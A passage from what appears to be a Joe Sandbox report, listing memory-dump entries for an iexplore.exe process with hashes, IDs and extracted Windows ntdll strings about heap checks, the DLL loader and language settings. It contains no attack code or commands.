                                                                                                                                                                              • Instruction ID: 35fce7336ec7e18559fb383b6085ef2c82325772bd36b819aa27d0c9e64b13e7
                                                                                                                                                                              • Opcode Fuzzy Hash: 25af31cbd47ff95376e41f9a602d52271d3dea7c4e9e59e871cdd56f59b35b90
                                                                                                                                                                              • Instruction Fuzzy Hash: 3C818CB1A20358EFDB20CF94C841BAEFBB9BF49714F244169E618B7641D3B5A9C0CB50
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                                                                                                                                                              • API String ID: 0-3591852110
                                                                                                                                                                              • Opcode ID: 8e963638477074592a6bffc282b1aa3a98ed287366aafc8a29be1c0a2d6b6b26
                                                                                                                                                                              • Instruction ID: 5b66dcef71762547a1072e834f3df0eccb9c0dca0a43a80106502b390761b187
                                                                                                                                                                              • Opcode Fuzzy Hash: 8e963638477074592a6bffc282b1aa3a98ed287366aafc8a29be1c0a2d6b6b26
                                                                                                                                                                              • Instruction Fuzzy Hash: E8129D34A10642DFD725EF68C881BBAB7F5FF0A714F18C459E4968BA41D774E881CB50
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                                                                                                                                                              • API String ID: 0-3532704233
                                                                                                                                                                              • Opcode ID: 386a47bc2733ab9f54c16ec58b615c4c5f7a8cc491b914a21e3311ce27891843
                                                                                                                                                                              • Instruction ID: 0bf7cb9a755b1a89e364f25420b7b46f512e56f1edb3ea967d4c0c2d90e18f4c
                                                                                                                                                                              • Opcode Fuzzy Hash: 386a47bc2733ab9f54c16ec58b615c4c5f7a8cc491b914a21e3311ce27891843
                                                                                                                                                                              • Instruction Fuzzy Hash: DBB16D729283569FCB21DF24C490A6BF7E8BF88754F05492EF889D7240D7B0D984CB92
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
                                                                                                                                                                              • API String ID: 0-3063724069
                                                                                                                                                                              • Opcode ID: 0bdf8fcd21571ca634dae6587e6b85616bba245b1dacf1852126a1017e72da2b
                                                                                                                                                                              • Instruction ID: 82e6d60c5ce1367d1afe7a1d792adc6fde9d41d2d08dc7f2bbe6dd0d12b2570e
                                                                                                                                                                              • Opcode Fuzzy Hash: 0bdf8fcd21571ca634dae6587e6b85616bba245b1dacf1852126a1017e72da2b
                                                                                                                                                                              • Instruction Fuzzy Hash: C4D11372829351AFD725DA54C890B6FF7ECAF84B24F040A2DFA84AB150D770DD9487E2
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                                                                                              • API String ID: 0-1700792311
                                                                                                                                                                              • Opcode ID: 571579c84434b92fdf4adaf717a9a1440f89ba81aecd4a5f2b14a37efb724274
                                                                                                                                                                              • Instruction ID: 135b901e4725a09edc25ad8644b6ec2f96b60f413e9b630b3190abe6359d7fc2
                                                                                                                                                                              • Opcode Fuzzy Hash: 571579c84434b92fdf4adaf717a9a1440f89ba81aecd4a5f2b14a37efb724274
                                                                                                                                                                              • Instruction Fuzzy Hash: 58D1DE39610785DFCB29DF68C880AADFBF5FF4A710F08C059E4569BA52C774A980CB50
                                                                                                                                                                              Strings
                                                                                                                                                                              • Control Panel\Desktop\LanguageConfiguration, xrefs: 0327D196
                                                                                                                                                                              • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 0327D0CF
                                                                                                                                                                              • @, xrefs: 0327D313
                                                                                                                                                                              • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 0327D262
                                                                                                                                                                              • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 0327D2C3
                                                                                                                                                                              • @, xrefs: 0327D2AF
                                                                                                                                                                              • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 0327D146
                                                                                                                                                                              • @, xrefs: 0327D0FD
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                                                                                                                                                              • API String ID: 0-1356375266
                                                                                                                                                                              • Opcode ID: a506a4a22976595467de69a96abfd01240c7ccadf34bb8f8c6f9fe25b90c88fc
                                                                                                                                                                              • Instruction ID: 28e6b19b76df1b381cee9336327796519e84a1e5f9b6476632ee710c658ffd8f
                                                                                                                                                                              • Opcode Fuzzy Hash: a506a4a22976595467de69a96abfd01240c7ccadf34bb8f8c6f9fe25b90c88fc
                                                                                                                                                                              • Instruction Fuzzy Hash: 3BA14B719283469FD721DF25C484B5BF7E8BF84715F004A2EF9989A240DBB4D988CF92
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                                                                                                                                              • API String ID: 0-523794902
                                                                                                                                                                              • Opcode ID: 370409b3b65e0e497ed640a5e3a5e278ffa1359fbc88baa597138a5d186397dd
                                                                                                                                                                              • Instruction ID: e9138032c33e500ab8dd9e6279a533f4a9f299524ea9344e4ae4607df2271e76
                                                                                                                                                                              • Opcode Fuzzy Hash: 370409b3b65e0e497ed640a5e3a5e278ffa1359fbc88baa597138a5d186397dd
                                                                                                                                                                              • Instruction Fuzzy Hash: EE42FD35628782EFC714DF28C994A2ABBE5FF88704F18496DE8968B351D770D8C1CB52
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                                                                                                                                              • API String ID: 0-122214566
                                                                                                                                                                              • Opcode ID: 088ab150238305c92348d10282b020905ce9e4af2ea6870757966a2c439d6515
                                                                                                                                                                              • Instruction ID: bf88c010d46e63b94a9fa0cb8e884bfa076c869b8bd5847aa6888ada74489d75
                                                                                                                                                                              • Opcode Fuzzy Hash: 088ab150238305c92348d10282b020905ce9e4af2ea6870757966a2c439d6515
                                                                                                                                                                              • Instruction Fuzzy Hash: 8CC12A31A30216ABEF24DF68D8917BEB7A5EF45700F1841AAEC459F291D7F489C4C391
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                                                                                                              • API String ID: 0-792281065
                                                                                                                                                                              • Opcode ID: a73d474402a6544c739de5f7b0687799bec10da9791f48ead94813d2e054920e
                                                                                                                                                                              • Instruction ID: fb09155eef4de1a962d2f3cd3a9e53b44197ed5e9d5c1ad856f066e5b8eb93a5
                                                                                                                                                                              • Opcode Fuzzy Hash: a73d474402a6544c739de5f7b0687799bec10da9791f48ead94813d2e054920e
                                                                                                                                                                              • Instruction Fuzzy Hash: E9913534A31755DFEB35EF15D894BABB7B8AB41B64F080138EA106B681D7F498C0CB90
                                                                                                                                                                              Strings
                                                                                                                                                                              • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 032F21BF
                                                                                                                                                                              • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 032F219F
                                                                                                                                                                              • RtlGetAssemblyStorageRoot, xrefs: 032F2160, 032F219A, 032F21BA
                                                                                                                                                                              • SXS: %s() passed the empty activation context, xrefs: 032F2165
                                                                                                                                                                              • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 032F2178
                                                                                                                                                                              • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 032F2180
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                                                                                                              • API String ID: 0-861424205
                                                                                                                                                                              • Opcode ID: 8e6c38952a3706e367c3269ca4b78df5fc142d69e5ce53e69cad61ee215dc867
                                                                                                                                                                              • Instruction ID: 7ef66de69345cfcb0e27cb196a1c0ccf1ad01f9b7ab56d0ecd5eb79999e8f1a1
                                                                                                                                                                              • Opcode Fuzzy Hash: 8e6c38952a3706e367c3269ca4b78df5fc142d69e5ce53e69cad61ee215dc867
                                                                                                                                                                              • Instruction Fuzzy Hash: 7931463AE70315EFE720DA989C85F9FB678DF52F80F094468BA046B142D270DEC0D6A4
                                                                                                                                                                              Strings
                                                                                                                                                                              • LdrpInitializeImportRedirection, xrefs: 032F8177, 032F81EB
                                                                                                                                                                              • Unable to build import redirection Table, Status = 0x%x, xrefs: 032F81E5
                                                                                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 032BC6C3
                                                                                                                                                                              • Loading import redirection DLL: '%wZ', xrefs: 032F8170
                                                                                                                                                                              • minkernel\ntdll\ldrredirect.c, xrefs: 032F8181, 032F81F5
                                                                                                                                                                              • LdrpInitializeProcess, xrefs: 032BC6C4
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                                                                                                              • API String ID: 0-475462383
                                                                                                                                                                              • Opcode ID: 80abf133f7027609b867237be2d6ba30b6fae44223680710c92cbb7abb0e76b1
                                                                                                                                                                              • Instruction ID: c092a4531dcd725c2494cd151274197525907795b5e0acddeacf361a55fbb107
                                                                                                                                                                              • Opcode Fuzzy Hash: 80abf133f7027609b867237be2d6ba30b6fae44223680710c92cbb7abb0e76b1
                                                                                                                                                                              • Instruction Fuzzy Hash: 813117756647419FC210EF28DC85E5BB7A8EFC4B20F040568F940AF2A1D660ED84CBA2
                                                                                                                                                                              Strings
                                                                                                                                                                              • Kernel-MUI-Language-SKU, xrefs: 032A542B
                                                                                                                                                                              • Kernel-MUI-Number-Allowed, xrefs: 032A5247
                                                                                                                                                                              • Kernel-MUI-Language-Disallowed, xrefs: 032A5352
                                                                                                                                                                              • Kernel-MUI-Language-Allowed, xrefs: 032A527B
                                                                                                                                                                              • WindowsExcludedProcs, xrefs: 032A522A
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                                                                                                              • API String ID: 0-258546922
                                                                                                                                                                              • Opcode ID: e9d0032bfafe049395866e7b98a9e011f5fa5a931ae1bdae22b3739bc2b1f7e8
                                                                                                                                                                              • Instruction ID: 03b6d1c887333b9922d7db945faf1cc59ce7d9d31d1792d97f3a3e3364be6afc
                                                                                                                                                                              • Opcode Fuzzy Hash: e9d0032bfafe049395866e7b98a9e011f5fa5a931ae1bdae22b3739bc2b1f7e8
                                                                                                                                                                              • Instruction Fuzzy Hash: 9BF14C76D24629EFCB11DFA8C9409EEBBB9FF49710F64005AE545EB210D7B09E81CB90
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                                                                                                                                                              • API String ID: 0-1975516107
                                                                                                                                                                              • Opcode ID: b4a06fc5fec50cdd1f358da56edaf6f5dcc610702c7d5f8629c266bdc8c2fe9e
                                                                                                                                                                              • Instruction ID: 477af51dbec83a90681b68c4fb36998c64ef9386b9769394d28ba2003e756408
                                                                                                                                                                              • Opcode Fuzzy Hash: b4a06fc5fec50cdd1f358da56edaf6f5dcc610702c7d5f8629c266bdc8c2fe9e
                                                                                                                                                                              • Instruction Fuzzy Hash: 35513035E24746DFDB24EFA8D5A479DBBB1BF48304F184159C8016BA91C7B4E8C2CB80
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                                                                                                                                                              • API String ID: 0-3061284088
                                                                                                                                                                              • Opcode ID: 9951fe9699f98e6de926ea70331327e19296bcc1fe1afb0913c30ab025e46d57
                                                                                                                                                                              • Instruction ID: b4b0420615ecb4ee474163918062ba949de7bd8417a77bafacb4e467dc48106a
                                                                                                                                                                              • Opcode Fuzzy Hash: 9951fe9699f98e6de926ea70331327e19296bcc1fe1afb0913c30ab025e46d57
                                                                                                                                                                              • Instruction Fuzzy Hash: AD012836179281DED225E31CB819FA6B7D8EB42B30F294449F4244FD51CAF498C0C660
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                                                                                                              • API String ID: 0-3178619729
                                                                                                                                                                              • Opcode ID: c8fce10b9eeb18704ffba313c26a840da667720b3275eb5ef0db9df384831f97
                                                                                                                                                                              • Instruction ID: 114dadfd1120706956a0af9f731a3ae408fffb1a4b2ee22d80d38a791e4228d9
                                                                                                                                                                              • Opcode Fuzzy Hash: c8fce10b9eeb18704ffba313c26a840da667720b3275eb5ef0db9df384831f97
                                                                                                                                                                              • Instruction Fuzzy Hash: 64139170A20656DFEF24CF68C4907A9F7F1BF49304F1881AAD859AB381D774A985CF90
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
                                                                                                                                                                              • API String ID: 0-3570731704
                                                                                                                                                                              • Opcode ID: 3b7b260fe6e6aab90d025b6ce49640ce61f38e3d42a8f6eed375d9021bfc6d69
                                                                                                                                                                              • Instruction ID: 249d778ceb2b589f684dd540dea541ed7d6326ae03eb71ebc1e33090ea92a7ec
                                                                                                                                                                              • Opcode Fuzzy Hash: 3b7b260fe6e6aab90d025b6ce49640ce61f38e3d42a8f6eed375d9021bfc6d69
                                                                                                                                                                              • Instruction Fuzzy Hash: 62925A75E2122ACFEF24CB15C891BA9B7B5BF45314F1981EAD849AB240D770AEC0CF51
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                                                                                              • API String ID: 0-379654539
                                                                                                                                                                              • Opcode ID: 732c5aedf3db5e6db8e5c7561bb7574530b6a83df3b5642ecc09b01bad7c8a9a
                                                                                                                                                                              • Instruction ID: 743a3639ecee311c8648a1b10e614180771163c0f2a6221bbaa1ff0a4336d16b
                                                                                                                                                                              • Opcode Fuzzy Hash: 732c5aedf3db5e6db8e5c7561bb7574530b6a83df3b5642ecc09b01bad7c8a9a
                                                                                                                                                                              • Instruction Fuzzy Hash: 6FC18E7552A382CFDB11EF54C044B6AB7F8FF84704F04496AF9968B290EB78C985CB52
                                                                                                                                                                              Strings
                                                                                                                                                                              • SXS: %s() passed the empty activation context, xrefs: 032F21DE
                                                                                                                                                                              • .Local, xrefs: 032B28D8
                                                                                                                                                                              • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 032F22B6
                                                                                                                                                                              • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 032F21D9, 032F22B1
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                                                                                                              • API String ID: 0-1239276146
                                                                                                                                                                              • Opcode ID: 391fe49b645ebbbdcbd3860de95ed8d5a29737f154919af42a4b3daa11244b6a
                                                                                                                                                                              • Instruction ID: 865d9e2d5302e9d43c7c91a394549a8935a52a5172c80a11499e806d0edcd95a
                                                                                                                                                                              • Opcode Fuzzy Hash: 391fe49b645ebbbdcbd3860de95ed8d5a29737f154919af42a4b3daa11244b6a
                                                                                                                                                                              • Instruction Fuzzy Hash: 5BA18C3592032ADFDB24CF54D884BA9B3B4AF59354F2849EAD908AB251D7709EC0CF90
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                                                                                                                                              • API String ID: 0-2586055223
                                                                                                                                                                              • Opcode ID: 8f7eafe752092d9afe3d8def496bce17d7fbcf1450c95935fa972a6ca3a6d4af
                                                                                                                                                                              • Instruction ID: 1b1e708603cb10266950ff7996df75663cae9de7a0fd3acad122b3fd20a8f436
                                                                                                                                                                              • Opcode Fuzzy Hash: 8f7eafe752092d9afe3d8def496bce17d7fbcf1450c95935fa972a6ca3a6d4af
                                                                                                                                                                              • Instruction Fuzzy Hash: 79610336228781AFD721DB28C944F6BB7E8FF80714F190869F9658F291D774E980CB61
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                                                                                                                                                              • API String ID: 0-336120773
                                                                                                                                                                              • Opcode ID: 2e91ed6766e5eea59c21d463cd9bea8dd2bd164eb6410ec1e662571f062963c6
                                                                                                                                                                              • Instruction ID: ab443d6935bc969731f279fc898632e1b4ada86cdea551eaed425061a56e5a43
                                                                                                                                                                              • Opcode Fuzzy Hash: 2e91ed6766e5eea59c21d463cd9bea8dd2bd164eb6410ec1e662571f062963c6
                                                                                                                                                                              • Instruction Fuzzy Hash: 9A310635A24200EFC760EB98CCC5F6AB3E8FF0A624F198555F412CB661D671ED80CB65
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                                                                                                                                                              • API String ID: 0-1391187441
                                                                                                                                                                              • Opcode ID: 669eeec25cb7f8ca3b3249884f6e19e294e626e8ce9ef72d7c21a8ddce8647f4
                                                                                                                                                                              • Instruction ID: 5a2eda9988739270b64f2410a5ee0bb7270b446edd6e7bfdd997dcb0687e055c
                                                                                                                                                                              • Opcode Fuzzy Hash: 669eeec25cb7f8ca3b3249884f6e19e294e626e8ce9ef72d7c21a8ddce8647f4
                                                                                                                                                                              • Instruction Fuzzy Hash: 2C318336630205EFCB11DB59CC89F9EB7B8FF45A20F154455F825AB691D7B0E9C0CA60
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                                                                                              • API String ID: 0-4253913091
                                                                                                                                                                              • Opcode ID: 356ce9c2c792a54d5ffac13dc5685b33d472579b21e9d5d9dca9278c2678125a
                                                                                                                                                                              • Instruction ID: 0b945f8b691e9f449d656b6d82b980a07c3dfa5e722940d89b0cd64718fe115a
                                                                                                                                                                              • Opcode Fuzzy Hash: 356ce9c2c792a54d5ffac13dc5685b33d472579b21e9d5d9dca9278c2678125a
                                                                                                                                                                              • Instruction Fuzzy Hash: 85F1BE34A2060ADFEB14CF68C891B6AB7F9FF45704F2481AAE4169B351D774E9C1CB90
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
                                                                                                                                                                              • API String ID: 0-1145731471
                                                                                                                                                                              • Opcode ID: cc8a358edb338b95bc318b799cf23a736fe0f207476f511dcc0974afda1a73fa
                                                                                                                                                                              • Instruction ID: c44806b148ec5048c03ce9c121fa23c718e4c8e2544e2f7c744d97c3a1af609f
